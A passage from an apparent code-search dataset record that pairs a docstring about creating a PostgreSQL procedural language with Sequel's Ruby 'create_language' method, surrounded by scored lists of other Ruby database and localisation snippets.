"def add_definition( name, *args )\n name, *args = schema.apply_defaults( self.name, name, *args )\n case name\n when :index\n add_index( *args )\n when :foreign_key\n add_foreign_key( *args )\n else\n add_column( name, *args )\n end\n end",
"def method_missing(name, *args)\n if args.empty?\n super\n else\n @table[\"_function_\"] = _klass_new(name, *args)\n end\n end",
"def create_database(name, _options = {})\n execute(\"CREATE SCHEMA `#{name}`\")\n end",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{table_name.inspect} for selector #{selector_keys.map(&:inspect).join(', ')} and setter #{setter_keys.map(&:inspect).join(', ')}\"\n first_try = true\n connection.execute(%{\n CREATE OR REPLACE FUNCTION #{name}(#{(selector_column_definitions.map(&:to_selector_arg) + setter_column_definitions.map(&:to_setter_arg) + hstore_delete_handlers.map(&:to_arg)).join(', ')}) RETURNS VOID AS\n $$\n DECLARE\n first_try INTEGER := 1;\n BEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{update_column_definitions.map(&:to_setter).join(', ')}\n WHERE #{selector_column_definitions.map(&:to_selector).join(' AND ') };\n IF found THEN\n #{hstore_delete_handlers.map(&:to_pgsql).join(' ')}\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{setter_column_definitions.map(&:quoted_name).join(', ')}) VALUES (#{setter_column_definitions.map(&:to_setter_value).join(', ')});\n #{hstore_delete_handlers.map(&:to_pgsql).join(' ')}\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- seamusabshere 9/20/12 only retry once\n IF (first_try = 1) THEN\n first_try := 0;\n ELSE\n RETURN;\n END IF;\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\n END;\n $$\n LANGUAGE plpgsql;\n })\n rescue\n if first_try and $!.message =~ /tuple concurrently updated/\n first_try = false\n retry\n else\n raise $!\n end\n end",
"def fn(name, &block)\n if block_given?\n @fns[name] = block\n else\n @fns[name]\n end\n end",
"def fn(name, &block)\n if block_given?\n @fns[name] = block\n else\n @fns[name]\n end\n end",
"def signature\n @signature ||= ::Amalgalite::SQLite3::Database::Function.signature( self.name, self.arity )\n end",
"def function_declaration(kind)\n name = consume(:identifier, \"Expect #{kind} name.\")\n consume(:lparen, \"Expect '(' after #{kind} name.\")\n parameters = []\n if !check?(:rparen)\n loop do\n if parameters.length >= 8\n error(peek, 'Cannot have more than 8 parameters')\n end\n parameters << consume(:identifier, 'Expect parameter name')\n break unless match?(:comma)\n end\n end\n consume(:rparen, \"Expect ')' after parameters.\")\n\n consume(:lbrace, \"Expect '{' before #{kind} body\")\n body = block\n return Ringo::Function.new(name, parameters, body)\n end",
"def create_database(name, options = {})\n options = { encoding: 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.inject(\"\") do |memo, (key, value)|\n memo += case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_sensor(name, opts)\n sensor_type = opts.respond_to?(:sensor_type) ? opts.sensor_type : opts[:sensor_type]\n klass_s = sensor_class(sensor_type)\n klass = constantize(klass_s)\n raise ArgumentError, \"#{klass_s} is not a valid class for a sensor\" unless klass\n args = (opts.respond_to?(:args) ? opts.args : opts[:args]) || {}\n klass.new(name, symbolize_keys(args.to_hash))\n end",
"def create(name=nil, options={})\n deprecate # 07/26/2012\n name = create_request(name, options)\n loop do\n break if create_complete?(name)\n sleep 1\n end\n name\n end",
"def add_udf(name, value)\n @params.merge!(\"UDF[#{name}]\" => value)\n end",
"def create_db(opts)\n\t\tbegin\n\t\t\tcase opts[\"adapter\"]\n\t\t\twhen 'sqlite3'\n\t\t\t\t# Sqlite just needs the file to be writable. ActiveRecord creates\n\t\t\t\t# it if it doesn't exist and checks permissions if it does. This\n\t\t\t\t# all happens during establish_connection(), so we don't need to\n\t\t\t\t# bother with creating anything here.\n\t\t\twhen 'postgresql','mysql'\n\t\t\t\tActiveRecord::Base.establish_connection(opts.merge('database' => nil))\n\t\t\t\tActiveRecord::Base.connection.create_database(opts['database'])\n\t\t\t\tActiveRecord::Base.remove_connection\n\t\t\tend\n\t\trescue ::Exception => e\n\t\t\tilog(\"Trying to continue despite failed database creation: #{e}\")\n\t\tend\n\tend",
"def initialize(name,description,function)\n @name = name\n @description = description\n @function = function\n end",
"def initialize(name, arity, fun)\n @name = name\n @arity = arity\n @fun = fun\n end",
"def create!(opts = {})\n instance = new(opts)\n instance.save!\n instance\n end",
"def Factory (name, attrs = {})\n Factory.create(name, attrs)\nend",
"def create(data, opts = {})\n data, _status_code, _headers = create_with_http_info(data, opts)\n data\n end"
] |
[
"0.7315047",
"0.70606333",
"0.66673636",
"0.6550817",
"0.64636093",
"0.6045642",
"0.58598155",
"0.5743289",
"0.55446565",
"0.550021",
"0.5414134",
"0.5371125",
"0.53436047",
"0.5325446",
"0.5200718",
"0.5181034",
"0.5116383",
"0.50801814",
"0.5057106",
"0.50351334",
"0.50280565",
"0.49996522",
"0.49874294",
"0.4986377",
"0.49673116",
"0.49399891",
"0.49387947",
"0.4848851",
"0.4795209",
"0.4795209",
"0.47724423",
"0.47723082",
"0.47717175",
"0.47565117",
"0.47515365",
"0.47158948",
"0.4713917",
"0.46936637",
"0.46391988",
"0.46117884",
"0.46064037",
"0.45985636",
"0.45958063",
"0.45946562",
"0.45943612",
"0.45924288",
"0.45924288",
"0.4591499",
"0.45829448",
"0.456904",
"0.45560554",
"0.45499453",
"0.45342693",
"0.45320925",
"0.45291704",
"0.45276484",
"0.451764",
"0.45066258",
"0.4486969",
"0.44800323",
"0.44764405",
"0.44672677",
"0.44671503",
"0.44607666",
"0.4453853",
"0.44365925",
"0.4434146",
"0.4428218",
"0.4423856",
"0.44027525",
"0.43990213",
"0.4393425",
"0.43678766",
"0.4364058",
"0.43567234",
"0.4354011",
"0.43507832",
"0.43506363",
"0.43481067",
"0.43477044",
"0.43402973",
"0.43324673",
"0.4321083",
"0.43190876",
"0.43170613",
"0.43110034",
"0.43102536",
"0.43102536",
"0.43089303",
"0.43052784",
"0.43021408",
"0.42952505",
"0.4291099",
"0.42898098",
"0.42860973",
"0.42852512",
"0.42679742",
"0.42679143",
"0.4264006",
"0.42550173"
] |
0.7249979
|
1
|
Create the procedural language in the database. Arguments:

name :: Name of the procedural language (e.g. plpgsql)
opts :: options hash:
        :handler :: The name of a previously registered function used as a call handler for this language.
        :replace :: Replace the installed language if it already exists (on PostgreSQL 9.0+).
        :trusted :: Marks the language being created as trusted, allowing unprivileged users to create functions using this language.
        :validator :: The name of a previously registered function used as a validator of functions defined in this language.
|
def create_language(name, opts=OPTS)
self << create_language_sql(name, opts)
end
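
A minimal usage sketch for the function above, assuming a connected Sequel PostgreSQL Database object named DB; the plsample handler and validator names below are illustrative placeholders, not taken from the source:

# Install plpgsql, replacing any existing installation (PostgreSQL 9.0+)
# and marking it trusted so unprivileged users can create functions in it.
DB.create_language(:plpgsql, replace: true, trusted: true)

# Register a language with an explicit call handler and validator; both
# must already exist as registered functions in the database.
DB.create_language(:plsample, handler: :plsample_call_handler,
                              validator: :plsample_validator)

Per the create_language_sql builder shown in the first negative below, the first call would emit "CREATE OR REPLACE TRUSTED LANGUAGE plpgsql" on a server at version 9.0 or later.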
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def create\n\t\t@language = @resume.languages.new({\n\t\t\t:name\t\t => 'Name',\n\t\t\t:level_id => 1\n\t\t})\n\t\t@language.save!\n\trescue\n\t\tflash.now[:error] = 'Language creation FAILED!'\n\t\trender :text => ''\n\tend",
"def create(name, source_lang, target_langs, options = {})\n options[:name] = name\n options[:sourceLang] = source_lang\n options[:targetLangs] = target_langs\n post(PATH, options)\n end",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_language(name, opts=OPTS)\n self << drop_language_sql(name, opts)\n end",
"def create_function_sql(name, definition, opts=OPTS)\n args = opts[:args]\n if !opts[:args].is_a?(Array) || !opts[:args].any?{|a| Array(a).length == 3 and %w'OUT INOUT'.include?(a[2].to_s)}\n returns = opts[:returns] || 'void'\n end\n language = opts[:language] || 'SQL'\n <<-END\n CREATE#{' OR REPLACE' if opts[:replace]} FUNCTION #{name}#{sql_function_args(args)}\n #{\"RETURNS #{returns}\" if returns}\n LANGUAGE #{language}\n #{opts[:behavior].to_s.upcase if opts[:behavior]}\n #{'STRICT' if opts[:strict]}\n #{'SECURITY DEFINER' if opts[:security_definer]}\n #{\"PARALLEL #{opts[:parallel].to_s.upcase}\" if opts[:parallel]}\n #{\"COST #{opts[:cost]}\" if opts[:cost]}\n #{\"ROWS #{opts[:rows]}\" if opts[:rows]}\n #{opts[:set].map{|k,v| \" SET #{k} = #{v}\"}.join(\"\\n\") if opts[:set]}\n AS #{literal(definition.to_s)}#{\", #{literal(opts[:link_symbol].to_s)}\" if opts[:link_symbol]}\n END\n end",
"def create\n @languagename = Languagename.new(languagename_params)\n\n respond_to do |format|\n if @languagename.save\n format.html { redirect_to @languagename, notice: 'Languagename was successfully created.' }\n format.json { render :show, status: :created, location: @languagename }\n else\n format.html { render :new }\n format.json { render json: @languagename.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create(language, body)\n Statements::CreateFunction\n .new(context: self, language: language, body: body)\n end",
"def create\n @programming_language = ProgrammingLanguage.new(programming_language_params)\n\n respond_to do |format|\n if @programming_language.save\n format.html { redirect_to @programming_language, notice: 'Programming language was successfully created.' }\n format.json { render :show, status: :created, location: @programming_language }\n else\n format.html { render :new }\n format.json { render json: @programming_language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_function(function_name, returning, definition, options = {})\n\n function_name = full_function_name(function_name, options)\n language = options[:language] || 'plpgsql'\n replace = if options[:replace] == false\n ''\n else\n 'OR REPLACE '\n end\n volatility = case options[:volatility]\n when :volatile, :stable, :immutable\n \"\\n #{options[:volatility].to_s.upcase}\"\n else\n \"\"\n end\n\n sql = <<-SQL.gsub(/^[ ]{6}/, \"\")\n CREATE #{replace}FUNCTION #{function_name}\n RETURNS #{returning}\n LANGUAGE #{language}#{volatility}\n AS $function$\n #{definition.strip}\n $function$\n SQL\n\n execute(sql)\n end",
"def create_schema(name, opts=OPTS)\n self << create_schema_sql(name, opts)\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create\n\t\t@language = Language.new(params[:language])\n\n\t\trespond_with @language do |format|\n\t\t\tif @language.save\n\t\t\t\tformat.html { redirect_to @language, notice: 'Language was successfully created.' }\n\t\t\t\tformat.json { render json: @language, status: :created, location: @language }\n\t\t\telse\n\t\t\t\tformat.html { render action: \"new\" }\n\t\t\t\tformat.json { render json: @language.errors, status: :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def create(name, options = {})\n last_slash = name.rindex(\"/\")\n category = name[0 ... last_slash]\n plugin = name[last_slash .. -1]\n\n map = @plugins[category]\n if not map\n raise \"Plugin category #{category} does not exist\"\n elsif not map.has_key? plugin\n raise \"Plugin #{plugin} does not exist in category #{category}\"\n else\n map[plugin].new(options)\n end\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create(name, text)\n @driver.addRule([name], [text])\n end",
"def create\n @langue = Langue.new(langue_params)\n\n respond_to do |format|\n if @langue.save\n format.html { redirect_to @langue, notice: 'Langue was successfully created.' }\n format.json { render :show, status: :created, location: @langue }\n else\n format.html { render :new }\n format.json { render json: @langue.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_function(name, definition, opts=OPTS)\n self << create_function_sql(name, definition, opts)\n end",
"def create\n database.command({ :create => name }.merge(options))\n end",
"def create\n @langopt = Langopt.new(langopt_params)\n\n respond_to do |format|\n if @langopt.save\n format.html { redirect_to @langopt, notice: 'Langopt was successfully created.' }\n format.json { render :show, status: :created, location: @langopt }\n else\n format.html { render :new }\n format.json { render json: @langopt.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @lang = Lang.new(params[:lang])\n\n respond_to do |format|\n if @lang.save\n format.html { redirect_to @lang, notice: 'Lang was successfully created.' }\n format.json { render json: @lang, status: :created, location: @lang }\n else\n format.html { render action: \"new\" }\n format.json { render json: @lang.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_database(name, options = {})\n options = { :encoding => 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :collation\n \" LC_COLLATE = '#{value}'\"\n when :ctype\n \" LC_CTYPE = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def register_language language_name, language = nil\n language_string = language_name.to_s\n @@languages[language_string.to_s] = language\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(encoding: 'utf8')\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n ''\n end\n end\n\n execute(\"CREATE DATABASE #{quote_table_name(name)}#{option_string}\")\n end",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def uhook_new_from_name name, options = {}\n ::Category.new(\n :name => name,\n :locale => (options[:locale] || :any).to_s,\n :parent_id => options[:parent_id]\n )\n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(:encoding => \"utf8\")\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_database(name)\n end",
"def create_translated_table(create_table_options = {})\n # create translatin column in main table, if it does not exist\n if !self.columns.find { |c| [self.language_column.to_s].include? c.name }\n self.connection.add_column table_name, self.language_column, :string\n end\n\n return if self.connection.table_exists?(translation_table_name)\n\n self.connection.create_table(translation_table_name, create_table_options) do |t|\n t.column translation_foreign_key, :integer\n t.column language_column, :string\n t.timestamps\n end\n \n trans_columns = if create_table_options[:columns]\n self.content_columns.select {|col| create_table_options[:columns].include?(col.name.to_sym) } \n else\n self.content_columns\n end\n\n trans_columns.each do |col| \n if !((self.connection.columns self.translation_table_name.to_sym).include?(col.name)) then\n self.connection.add_column translation_table_name, col.name, col.type, \n :limit => col.limit, \n :default => col.default,\n :scale => col.scale,\n :precision => col.precision\n end\n end\n\n self.connection.add_index translation_table_name, translation_foreign_key\n end",
"def initialize(name, owner, language)\r\n super(name, owner)\r\n self.language = language\r\n @prog = nil\r\n end",
"def create_database(name, _options = {})\n execute(\"CREATE SCHEMA `#{name}`\")\n end",
"def introduction_with_language(name, language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def generate(name, glsl, typeInfo)\n # Merge type information for all argument lists a function might\n # have.\n minParam, paramTypes = mergeParameterLists(typeInfo.parameterLists)\n\n # Assemble type annotations for the closure compile.\n paramtypestr = []\n paramstr = []\n (0...minParam).each do |i|\n paramtypestr << \" * @param {!(#{paramTypes[i].toClosure})} arg#{i}\\n * Function argument #{i}.\"\n paramstr << \"arg#{i}\"\n end\n (minParam...paramTypes.size).each do |i|\n paramtypestr << \" * @param {!(#{paramTypes[i].toClosure})=} arg#{i}\\n * Function argument #{i}.\"\n paramstr << \"arg#{i}\"\n end\n annotations = paramtypestr.join(\"\\n\")\n\n return <<EOF\n\n/**\n * Create expression for GLSL function '#{glsl}'.\n *\n#{annotations}\n * @return {!embedsl.Expression} Created expression.\n */\nembedsl.lang.#{name} = (function() {\n var cached = #{typeInfo.toEsl};\n return function(#{paramstr.join(\",\\n \")}) {\n var args = Array.prototype.slice.call(arguments);\n return new embedsl.Expression(\n embedsl.Kind.BUILTIN, cached, '#{name}', '#{glsl}', args);\n };\n})();\nEOF\nend",
"def create_translations\n end",
"def add_name_translation(text, lang_code)\n name_translation = NameTranslation.create(:text => text, :lang_code => lang_code)\n\n name_translations << name_translation\n end",
"def new_plan(name, puppet: false)\n Bolt::PlanCreator.validate_input(config.project, name)\n Bolt::PlanCreator.create_plan(config.project.plans_path, name, puppet)\n end",
"def introduction_with_language(name, language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def introduction_with_language(name, language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\\n\"\nend",
"def create\n @language_dialect = LanguageDialect.new(language_dialect_params)\n\n respond_to do |format|\n if @language_dialect.save\n format.html { redirect_to @language_dialect, notice: 'Language dialect was successfully created.' }\n format.json { render :show, status: :created, location: @language_dialect }\n else\n format.html { render :new }\n format.json { render json: @language_dialect.errors, status: :unprocessable_entity }\n end\n end\n end",
"def introduction_with_language(name,language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def create_extension(extension_name, options = {})\n options = CREATE_EXTENSION_DEFAULTS.merge(options.symbolize_keys)\n\n sql = ['CREATE EXTENSION']\n sql << 'IF NOT EXISTS' if options[:if_not_exists]\n sql << %Q{\"#{extension_name.to_s}\"}\n sql << \"SCHEMA #{options[:schema_name]}\" if options[:schema_name].present?\n sql << \"VERSION '#{options[:version]}'\" if options[:version].present?\n sql << \"FROM #{options[:old_version]}\" if options[:old_version].present?\n\n sql = sql.join(' ')\n execute(sql)\n end",
"def create_engine(params={})\n text = parameters(params, :text)\n opts = engine_options(params)\n\n ::Maruku.new(text, opts)\n end",
"def create\n @language = Language.new(language_params)\n\n respond_to do |format|\n if @language.save\n format.html { redirect_to @language, notice: 'Language was successfully created.' }\n format.json { render :show, status: :created, location: @language }\n else\n format.html { render :new }\n format.json { render json: @language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def language\n if !block_given?\n return @j_del.java_method(:language, []).call()\n end\n raise ArgumentError, \"Invalid arguments when calling language()\"\n end",
"def create\n unless current_user.admin?\n redirect_to :tournaments, flash: {error: 'Only administrators can create new tournaments.'}\n return\n end\n\n @tournament = Tournament.new(tournament_params)\n\n if @tournament.save\n # now create the TournamentLanguages\n TournamentLanguage::LanguageOptions.each do |(name, key)|\n if params['languages'][key] == \"1\"\n TournamentLanguage.create(language: name, tournament_id: @tournament.tournament_id)\n end\n end\n redirect_to @tournament, flash: {success: 'Tournament was created!'}\n else\n redirect_to @tournament, flash: {error: \"Failed to create tournament: #{@tournament.errors.full_messages}\"}\n end\n end",
"def create_db(options)\n info \"Created database '#{options[:name]}'\"\n end",
"def sign_up(name:, user_name:)\n user_name = user_name.downcase\n return SYNTAX_ERROR if include_punctuation?(user_name)\n return TOO_LONG_ERROR if too_long?(user_name)\n return TOO_SHORT_ERROR if too_short?(user_name)\n\n @user_class.add(name: name, user_name: user_name)\n end",
"def enable_extension(name)\n execute(\"CREATE EXTENSION IF NOT EXISTS \\\"#{name}\\\"\")\n end",
"def create\n # @language = Language.new(language_params)\n\n # respond_to do |format|\n # if @language.save\n # format.html { redirect_to @language, notice: 'Language was successfully created.' }\n # format.json { render :show, status: :created, location: @language }\n # else\n # format.html { render :new }\n # format.json { render json: @language.errors, status: :unprocessable_entity }\n # end\n # end\n end",
"def create\n @language = Language.new(params[:language])\n\n respond_to do |format|\n if @language.save\n flash[:notice] = t('languages.new.success')\n format.html { redirect_to(@language) }\n format.xml { render :xml => @language, :status => :created, :location => @language }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @language.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create_locale\n set_params\n create_locale_file( params[:locale], params[:locale_name] )\n redirect_to :back\n end",
"def language(options = {})\n Babel.guess(self, options)\n end",
"def create_from_file( file_name )\n vcg = ValidationCheckerGenerator.new\n vcg.generate( LDLgeneratedLanguage::Language_gds_check.parse( File.read( file_name ) ) )\n end",
"def create\n @r_language = RLanguage.new(r_language_params)\n\n respond_to do |format|\n if @r_language.save\n format.html { redirect_to @r_language, notice: 'R language was successfully created.' }\n format.json { render action: 'show', status: :created, location: @r_language }\n else\n format.html { render action: 'new' }\n format.json { render json: @r_language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create name='', config={}, project=nil\n @@step_map[name.to_sym].new(name, config, project) || Step.new(name, config, project)\n end",
"def parse_lang_file\n # Open .lang file and parse it, then copy \n # its full grammatical expression.\n File.open(@lang_file, \"r:UTF-8\") do |file|\n lines_count = 1\n current = :none\n\n # Evaluating lines\n while (line = file.gets)\n # Parsing .lang file\n case line\n when /(^\\s*$)|(^\\s*#.*$)/\n # Ignore blank lines or comments\n \n when /^\\s*symbols\\s*for\\s*(\\w*)?\\s*(\\w+)\\s*:\\s*(#.*)?$/\n # Create new symbol set\n captured = line.scan(/\\s*(\\w+)\\s*:/)\n current_binding = captured[0][0]\n @bindings[current_binding] = ConlangWordGenerator::SymbolSet.new\n current = :symbols\n\n when /^\\s*expression\\s*:\\s*(#.*)?$/\n # Start of grammatical expression\n current = :expression\n\n when /^\\s*replacements\\s*:\\s*(#.*)?$/\n # Start of list of replacements\n current = :replacements\n\n when /^\\s*(\\S+)\\s*[:=]\\s*(\\S+)\\s*(#.*)?$/\n # Add bindings\n case current\n when :symbols\n #Add a symbol to the current SymbolSet's binding\n @bindings[current_binding].add_pair($1, $2.to_i)\n when :replacements\n @replacements[$1] = $2\n else\n raise LangSyntaxError, \"Runtime error when evaluating \" +\n \"\\\"#{@lang_file}\\\" at binding line #{lines_count}.\"\n end\n else\n if current == :expression\n # Copying expression\n @full_expression += line.strip\n else\n raise LangSyntaxError, \"Runtime error when evaluating \" +\n \"\\\"#{@lang_file}\\\" at line #{lines_count}.\"\n end\n end\n\n #Counting lines\n lines_count += 1\n end\n end\n end",
"def plugin(name, options={})\n ops = resolve_defaults(options)\n GemPlugin::Manager.instance.create(name, ops)\n end",
"def create(name)\n self.new(name)\n end",
"def create_database(name, options = {})\n options = { encoding: 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.inject(\"\") do |memo, (key, value)|\n memo += case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def translate(*args, **opts); end",
"def introduction_with_language_optional(name,language=\"Ruby\")\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def create(name, action, seqno, opts = {})\n if opts.empty?\n cmds = name_commands(name, action, seqno)\n else\n if opts[:match] && !opts[:match].is_a?(Array)\n raise ArgumentError, 'opts match must be an Array'\n end\n cmds = name_commands(name, action, seqno, opts)\n if opts[:description]\n cmds << 'no description'\n cmds << \"description #{opts[:description]}\"\n end\n if opts[:continue]\n cmds << 'no continue'\n cmds << \"continue #{opts[:continue]}\"\n end\n if opts[:match]\n remove_match_statements(name, action, seqno, cmds)\n opts[:match].each do |options|\n cmds << \"match #{options}\"\n end\n end\n if opts[:set]\n remove_set_statements(name, action, seqno, cmds)\n opts[:set].each do |options|\n cmds << \"set #{options}\"\n end\n end\n end\n configure(cmds)\n end",
"def create_new_party\n # No language choice => default language\n if LANGUAGE_CHOICE_LIST.empty?\n $pokemon_party = PFM::Pokemon_Party.new(false, DEFAULT_GAME_LANGUAGE)\n else\n @all_window.each { |window| window.visible = false }\n call_scene(Language_Choice)\n end\n end",
"def create_by_name(name)\n self.new.tap do |o|\n o.name = name # ambos sirven\n end\n end",
"def handle_proglangs(proglang_names)\n return if !self.undergrad? || proglang_names.nil?\n self.proglangs = [] # eliminates any previous proficiencies so as to avoid duplicates\n proglang_array = []\n proglang_array = proglang_names.split(',').uniq if proglang_names\n proglang_array.each do |pl|\n self.proglangs << Proglang.find_or_create_by(name: pl.upcase.strip)\n end\n end",
"def create\r\n @language = Language.new(language_params)\r\n\r\n respond_to do |format|\r\n if @language.save\r\n format.html { redirect_to root_path, notice: 'language was successfully created.' }\r\n format.json { render action: 'show', status: :created, location: @language }\r\n else\r\n format.html { render action: 'new' }\r\n format.json { render json: @language.errors, status: :unprocessable_entity }\r\n end\r\n end\r\n end",
"def create\n @language = Language.new(params[:language])\n if current_user.is_admin?\n @language.verify = 'true'\n end\n\n respond_to do |format|\n if @language.save\n UserMailer.language_created_email(@language).deliver\n format.html { redirect_to :back, notice: t(:thanks_for_your_contribution_wait_verifying) }\n format.json { render json: @language, status: :created, location: @language }\n else\n format.html { redirect_to :back, alert: @language.errors.full_messages }\n format.json { render json: @language.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{buffer.parent.table_name.inspect} for selector #{selector.map(&:inspect).join(', ')} and columns #{columns.map(&:inspect).join(', ')}\"\n column_definitions = get_column_definitions\n connection.execute <<-EOS\nCREATE OR REPLACE FUNCTION #{name}(#{column_definitions.map { |c| \"#{c.quoted_input_name} #{c.sql_type} DEFAULT #{c.default || 'NULL'}\" }.join(',') }) RETURNS VOID AS\n$$\nBEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{column_definitions.map { |c| \"#{c.quoted_name} = #{c.quoted_input_name}\" }.join(',')}\n WHERE #{selector.map { |k| \"#{connection.quote_ident(k)} = #{connection.quote_ident([k,'input'].join('_'))}\" }.join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{column_definitions.map { |c| c.quoted_name }.join(',')}) VALUES (#{column_definitions.map { |c| c.quoted_input_name }.join(',')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\nEND;\n$$\nLANGUAGE plpgsql;\nEOS\n end",
"def coding_with_language(#{name}, #{language})\n puts \"Hi, my name is #{name} and I am learning to program in #{language}!\"\nend",
"def generate(name, symbol, typeInfo)\n ptl = typeInfo.parameterLists[0]\n return <<EOF\n\n/**\n * Create expression for GLSL operator '#{symbol}'.\n *\n#{ptl.toClosureAnnotation}\n * @return {!embedsl.Expression} Created expression.\n */\nembedsl.lang.#{name} = (function() {\n var cached = #{typeInfo.toEsl};\n return function(#{ptl.toParameterList}) {\n var args = Array.prototype.slice.call(arguments);\n return new embedsl.Expression(\n embedsl.Kind.OPERATOR, cached, '#{name}', '#{symbol}', args);\n };\n})();\nEOF\nend",
"def after_create\n GetText::Db::Language.find(:all).each do |lang|\n self.completions.create(:language => lang)\n end\n end",
"def create\n @programming_l = ProgrammingL.new(programming_l_params)\n\n respond_to do |format|\n if @programming_l.save\n format.html { redirect_to @programming_l, notice: 'Programming l was successfully created.' }\n format.json { render :show, status: :created, location: @programming_l }\n else\n format.html { render :new }\n format.json { render json: @programming_l.errors, status: :unprocessable_entity }\n end\n end\n end",
